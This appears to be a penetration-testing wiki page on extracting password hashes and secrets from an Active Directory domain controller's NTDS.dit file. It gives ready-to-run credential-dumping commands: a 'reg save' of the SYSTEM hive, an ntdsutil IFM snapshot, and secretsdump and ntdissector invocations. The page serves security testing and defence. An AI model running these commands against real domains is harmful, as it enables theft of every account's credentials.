NTDS Secret Extraction

Theory

NTDS Secret

NTDS (Windows NT Directory Services) is the directory services used by Microsoft Windows NT to locate, manage, and organize network resources. The NTDS.dit file is a database that stores the Active Directory data (including users, groups, security descriptors and password hashes). This file is stored on the domain controllers.

Once the secrets are extracted, they can be used for various attacks: , , , , , or .

Practical

Exfiltration

Since the NTDS.dit is constantly used by AD processes such as the Kerberos KDC, it can't be copied like any other file. In order to exfiltrate it from a live domain controller and extract password hashes from it, many techniques can be used.

Just like with , the SYSTEM registry hive contains enough info to decrypt the NTDS.dit data. The hive file (\system32\config\system) can either be exfiltrated the same way the NTDS.dit file is, or it can be exported with reg save HKLM\SYSTEM 'C:\Windows\Temp\system.save'.

AD Maintenance (NTDSUtil)

NTDSUtil.exe is a diagnostic tool available as part of Active Directory. It has the ability to save a snapshot of the Active Directory data. Running the following command will copy the NTDS.dit database and the SYSTEM and SECURITY hives to C:\Windows\Temp.

ntdsutil "activate instance ntds" "ifm" "create full C:\Windows\Temp\NTDS" quit quit

The following files can then be exported

• C:\Windows\Temp\NTDS\Active Directory\ntds.dit

• C:\Windows\Temp\NTDS\registry\SYSTEM

Secrets Dump

secretsdump -ntds ntds.dit.save -system system.save LOCAL
gosecretsdump -ntds ntds.dit.save -system system.save

./secretsdump.py -ntds ~/Downloads/regbackup/ntds.dit -system ~/Downloads/regback/SYSTEM LOCAL

# Dump users, groups and domain backup keys
ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f user,group,secret

# Dump all records from the database
ntdissector -ntds NTDS.dit -system SYSTEM -outputdir /tmp/ntdissector/ -ts -f all

REFERENCES